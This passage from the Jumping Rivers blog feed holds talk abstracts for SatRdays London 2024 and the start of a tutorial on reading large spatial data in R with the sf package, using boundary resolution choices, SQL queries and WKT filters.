&lt;p&gt;The Ash Dieback Pipeline is a computer vision project which attempts to identify trees with the Ash Dieback disease from video footage of roadways around the UK. We intend to showcase how we use R to process a variety of geospatial datasets and attempt to model the risk to road users associated with a diseased tree remaining untreated.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Our work at Mott MacDonald often involves wrangling complex datasets to answer multifaceted questions. R provides excellent toolkits for integrating, analysing, and visualising geospatial datasets. We intend to demonstrate how R can be used for creative visualisation of geospatial data to extract and communicate actionable insights.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Through these examples, we hope to outline our team’s maturity journey towards building multilingual spatial data science capabilities alongside traditional GIS platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="myles-mitchell---jumping-rivers"&gt;&lt;a href="https://uk.linkedin.com/in/myles-mitchell-4009aa98" rel="external"&gt;Myles Mitchell&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; &lt;img src="images/myles@2x.jpg" alt="Photo of Myles Mitchell" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="using-r-to-teach-r"&gt;Using R to teach R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;At Jumping Rivers, we teach over forty courses covering data science topics, including programming, data visualisation and machine learning, in R as well as Python, Tableau, Git, Docker and Stan. Most courses follow the same template: static notes, live coding scripts and presentation slides. For every taught course we also have to spin up a bespoke virtual environment, collect feedback and generate certificates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk, I will explain how we have used R to streamline the course writing process, automate the course build and deployment to Posit Workbench, and conduct post-course administrative tasks. With over 100 courses taught every year, each step in this pipeline must be rigorously tested so that, on the day, the trainer can focus on the attendees without having to worry about technical issues.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will draw on our process&amp;rsquo;s successes (and shortcomings) and share some take-home lessons applicable to any big coding project, including packaging of source code, automated testing and scheduled builds.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="nicola-rennie---lancaster-university"&gt;&lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; - &lt;a href="https://www.lancaster.ac.uk/health-and-medicine/research/statistics/" rel="external"&gt;Lancaster University&lt;/a&gt; &lt;img src="images/nicola@2x.jpg" alt="Photo of Nicola Rennie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="typst-or-latex-styling-pdf-documents-with-quarto-extensions"&gt;Typst or LaTeX? Styling PDF documents with Quarto extensions&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Quarto is an open-source scientific and technical publishing system that allows you to combine text with code to create fully reproducible documents in a variety of formats. The addition of custom styling to documents can make them look more professional and recognisable. In this talk, I&amp;rsquo;ll give an overview of ways to create customised PDF documents using Quarto. Until recently, this meant getting to grips with LaTeX. Now, there&amp;rsquo;s a new kid on the block: Typst. Typst is an open-source typesetting system that is designed to be as powerful as LaTeX while being much easier to learn and use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Extensions are a powerful way to modify and extend the behaviour of Quarto, including adding styling to your documents with LaTeX or Typst. To demonstrate the differences between LaTeX and Typst, I’ll walk through the process of converting a LaTeX-based style extension to Typst, allowing users to easily switch between them. We’ll compare the two – discussing error messages (we all get them!), render time, and customisability along the way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matt-thomas---british-red-cross"&gt;&lt;a href="https://www.linkedin.com/in/matthewgthomas/" rel="external"&gt;Matt Thomas&lt;/a&gt; - &lt;a href="https://www.redcross.org.uk/" rel="external"&gt;British Red Cross&lt;/a&gt; &lt;img src="images/matt@2x.jpg" alt="Photo of Matt Thomas" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="where-data-meets-disaster-a-journey-through-the-british-red-crosss-humaniverse"&gt;Where data meets disaster: A journey through the British Red Cross’s &amp;lsquo;humaniverse&amp;rsquo;&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;The ‘Humaniverse’ is a suite of R packages produced by the British Red Cross’s data scientists for sharing humanitarian data and tools. Open data and analyses are vital for 21st Century humanitarianism and these packages have transformed the speed and scale at which we can provide answers about emerging and ongoing humanitarian crises in the UK. In this talk, I will offer an overview of the Humaniverse and will share some of the ways we have used this infrastructure to inform how the British Red Cross supports people affected by disasters, displacement, and health crises. I will cover our core R packages, discuss how and why we work in the open, demonstrate some of the analyses and apps we’ve built using this infrastructure, and share our ambitions for the future of the Humaniverse.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;div class="central-content"&gt;
&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" class="buttony-link dark"&gt;Register Now &lt;i class="fa fa-angle-double-right"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reading large spatial data</title><link>https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/</link><pubDate>Thu, 04 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;I love playing with spatial data. Perhaps because I enjoy exploring the
outdoors, or because I spend hours playing
&lt;a href="https://www.geoguessr.com" rel="external"&gt;Geoguessr&lt;/a&gt;, or maybe it’s just because maps
are &lt;em&gt;pretty&lt;/em&gt; but there’s nothing more fun than tinkering with location
data.&lt;/p&gt;
&lt;p&gt;However, reading in spatial data, especially large data sets can
sometimes be a pain. Here are some simple things to consider when
working in spatial data in R and breaking large data sets into more
manageable chunks.&lt;/p&gt;
&lt;h3 id="choose-the-right-resolution"&gt;Choose the right resolution&lt;/h3&gt;
&lt;p&gt;Before you even start playing with your data, ask yourself if you’ve got
the appropriate data set for the job. Spatial data can come in different
resolutions, and depending on the type of analysis or visualisation you
are doing you might not need really accurate boundaries. Choosing a
smaller file at the cost of a little accuracy can massively reduce the
file size and read in times. Of course, you don’t always have the luxury
of choosing your data, but if you can it can make a big difference.&lt;/p&gt;
&lt;p&gt;For example, I live in the UK so I often use the &lt;a href="https://geoportal.statistics.gov.uk" rel="external"&gt;Open Geography
portal&lt;/a&gt;. This is hosted by the
Office for National Statistics (ONS) and provides free and open access
geographic data for the UK. The ONS provide boundaries for each
geography at both full resolution and generalised formats that provide
a smoothing of the full boundaries. The full resolution is the highest
resolution data available, which can result in very large file sizes.
&lt;a href="https://geoportal.statistics.gov.uk/datasets/ons::boundary-dataset-guidance-2021-onwards/about" rel="external"&gt;Generalised
formats&lt;/a&gt;
preserve much of the original detail but are much smaller in size
providing a good compromise.&lt;/p&gt;
&lt;p&gt;For the types of visualisations I make, generalised data is sufficient.
As a small example, I downloaded the UK &lt;a href="https://geoportal.statistics.gov.uk/search?q=BDY_LSOA%20DEC_2021" rel="external"&gt;Lower layer Super Output Areas
datasets&lt;/a&gt;
with Full, Generalised and Super Generalised boundaries and calculated
the file sizes and time to read in. I also plotted the three different
resolutions with &lt;code&gt;geom_sf()&lt;/code&gt; so you can compare how they look.&lt;/p&gt;
&lt;table&gt;
&lt;caption&gt;File size and read times for various resolutions of the same
data set.&lt;/caption&gt;
&lt;thead&gt;
&lt;tr class="header"&gt;
&lt;th&gt;Resolution&lt;/th&gt;
&lt;th&gt;Generalised to&lt;/th&gt;
&lt;th&gt;File size&lt;/th&gt;
&lt;th&gt;Time to read&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Full&lt;/td&gt;
&lt;td&gt;0m&lt;/td&gt;
&lt;td&gt;546 MB&lt;/td&gt;
&lt;td&gt;2s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="even"&gt;
&lt;td&gt;Generalised&lt;/td&gt;
&lt;td&gt;20m&lt;/td&gt;
&lt;td&gt;50MB&lt;/td&gt;
&lt;td&gt;750ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="odd"&gt;
&lt;td&gt;Super generalised&lt;/td&gt;
&lt;td&gt;200m&lt;/td&gt;
&lt;td&gt;16MB&lt;/td&gt;
&lt;td&gt;620ms&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;File size and read times for various resolutions of the same data set.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-large-spatial-data"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The full resolution file is 10 times bigger than the generalised one,
but visually it’s hard to see the difference between the boundaries.
Remember that higher resolution data sets will also take longer to
render when you plot them.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/resolution.png" style="width:100%" alt="Three maps of Newcastle LSOAs with different boundary resolutions."/&gt;
&lt;/p&gt;
&lt;h3 id="read-only-what-you-need-with-sql-queries"&gt;Read only what you need with SQL queries&lt;/h3&gt;
&lt;p&gt;Sometimes you only need a subset of the data you’ve been given. Let’s
say I have data for the UK, but I only need the LSOAs in Wales. It’s
inefficient to load the entire data set, to then immediately throw away
most of the rows. It would make much more sense for me to only load into
memory the rows that I need. In R, we use the &lt;code&gt;st_read()&lt;/code&gt; function from
{sf} to parse spatial data. The &lt;code&gt;query&lt;/code&gt; argument in &lt;code&gt;st_read()&lt;/code&gt; allows
for reading just parts of the file into memory using SQL queries to
filter the data on disk.&lt;/p&gt;
&lt;p&gt;The format of the query is &lt;code&gt;SELECT columns FROM layer WHERE condition&lt;/code&gt;.
So to select all columns from my LSOA layer with code starting with “W”
(for Wales 🏴󠁧󠁢󠁷󠁬󠁳󠁿) we would use the following query.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SELECT * FROM LSOA_2021_EW_BGC_V3 WHERE LSOA21CD LIKE &amp;#39;W%&amp;#39;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; quiet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple feature collection with 1917 features and 7 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Geometry type: MULTIPOLYGON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Dimension: XY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bounding box: xmin: 146615.2 ymin: 164586.3 xmax: 355312.8 ymax: 395982.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Projected CRS: OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## First 10 features:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## LSOA21CD LSOA21NM BNG_E BNG_N LONG LAT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 W01000003 Isle of Anglesey 001A 244606 393011 -4.33934 53.41098&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 W01000004 Isle of Anglesey 001B 242766 392434 -4.36671 53.40525&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 W01000005 Isle of Anglesey 005A 259172 377173 -4.11332 53.27280&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 W01000006 Isle of Anglesey 006A 240111 379172 -4.39991 53.28535&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 W01000007 Isle of Anglesey 009A 240423 370062 -4.39067 53.20362&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 W01000008 Isle of Anglesey 008A 253221 372359 -4.20027 53.22795&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 W01000009 Isle of Anglesey 007C 237013 376457 -4.44494 53.26002&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 W01000010 Isle of Anglesey 002A 250545 382806 -4.24524 53.32103&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 W01000011 Isle of Anglesey 008B 254994 372208 -4.17367 53.22708&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 W01000012 Isle of Anglesey 006B 246450 374976 -4.30288 53.24954&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## GlobalID SHAPE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 {C18AD6F8-CD89-453E-A34A-B9ACE9B58203} MULTIPOLYGON (((244811.2 39...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 {0ED47DC7-B1FE-4E63-84A6-995B701A39C0} MULTIPOLYGON (((241027.3 39...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 {EA47EE1B-C4F6-442F-B2F3-58EEA678DB1E} MULTIPOLYGON (((259509.4 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 {8FA5312C-C4CF-4B38-B7BD-44C824D15ED0} MULTIPOLYGON (((241039 3817...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 {A6509D8B-7C3D-4260-BA0F-BCECFFBEEA66} MULTIPOLYGON (((245072.1 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 {73F66A80-7EE7-4A98-899C-9702711DA427} MULTIPOLYGON (((253481.6 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 {7AB711C3-C230-4236-877B-8746ED3E1DCA} MULTIPOLYGON (((235911.7 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 {B5A77ECA-8CDC-4F82-B07E-3305622D1175} MULTIPOLYGON (((251300.9 38...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 {F7037CC7-D94A-4B6B-BEDA-7F02CF2CC5A5} MULTIPOLYGON (((256049.2 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 {A1A42AA3-FF44-4F13-9B60-82F9E7FB5681} MULTIPOLYGON (((246333.7 37...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here &lt;code&gt;*&lt;/code&gt; means SELECT all columns, and &lt;code&gt;LIKE&lt;/code&gt; is used to match strings
against a pattern in the &lt;a href="https://gdal.org/user/ogr_sql_dialect.html" rel="external"&gt;OGR SQL
dialect&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;But what if you don’t know the names of the layer you want to read in?
You can use &lt;code&gt;st_layers()&lt;/code&gt; to identify the layer(s) of interest without
reading in the entire data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_layers&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Driver: GPKG &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Available layers:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## layer_name geometry_type features fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 LSOA_2021_EW_BGC_V3 Multi Polygon 35672 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## crs_name&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But what if you don’t know the names of your columns? You can look at
the first polygon only to get an idea about the structure without
loading the entire data set. Just use the feature ID attribute to read
in just the first row of your data with &lt;code&gt;WHERE FID = 1&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;SELECT * FROM LSOA_2021_EW_BGC_V3 WHERE FID = 1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; quiet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple feature collection with 1 feature and 7 fields&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Geometry type: MULTIPOLYGON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Dimension: XY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bounding box: xmin: 531948.3 ymin: 181263.5 xmax: 532308.9 ymax: 182011.9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Projected CRS: OSGB36 / British National Grid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## LSOA21CD LSOA21NM BNG_E BNG_N LONG LAT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 E01000001 City of London 001A 532123 181632 -0.09714 51.51816&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## GlobalID SHAPE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 {1A259A13-A525-4858-9CB0-E4952BA01AF6} MULTIPOLYGON (((532105.3 18...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This only reads in the top row of the data, which is an LSOA &lt;code&gt;E01000001&lt;/code&gt;
in the City of London.&lt;/p&gt;
&lt;h3 id="spatial-filtering"&gt;Spatial filtering&lt;/h3&gt;
&lt;p&gt;In the last example, we filtered our dataset before reading it into R by
using some of the metadata that was attached to our spatial polygons.
But what if you don’t have any columns that provide a useful filter?
You can also filter by the &lt;em&gt;spatial&lt;/em&gt; properties of your data. Let’s try
and read in only the Welsh LSOAs again, but this time, using the spatial
property only.&lt;/p&gt;
&lt;p&gt;First we need to create a polygon that we want our LSOAs to overlap
with. A boundary for Wales is available within the &lt;a href="https://geoportal.statistics.gov.uk/datasets/99ac6ae4ea4d42a9b0fff4171b7366db_0/explore?location=54.996612%2C-3.316942%2C6.11" rel="external"&gt;countries data set
on Open
GeoPortal&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uk &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Countries_December_2022_GB_BGC.gpkg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(uk, CTRY22NM &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Wales&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then turn that geometry into a &lt;em&gt;well-known text&lt;/em&gt; string. This is
simply a text representation of the polygon. We use &lt;code&gt;st_geometry()&lt;/code&gt; to
grab the geometry column of the data frame, and then &lt;code&gt;st_as_text()&lt;/code&gt; to
convert to a well-known text string.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales_wkt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wales &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_geometry&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_text&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This well-known text is just a string defining the outline of the
polygon we want to use as our &lt;em&gt;bounding box&lt;/em&gt; (here Wales). It looks a
bit like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;quot;MULTIPOLYGON (((313022.3 384930.5, 312931.3 385007.4, 312644.5 38519.8, ...)))&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can then use that string in the &lt;code&gt;wkt_filter&lt;/code&gt; argument of &lt;code&gt;st_read()&lt;/code&gt;
to only read in LSOAs that overlap with the Wales polygon.&lt;/p&gt;
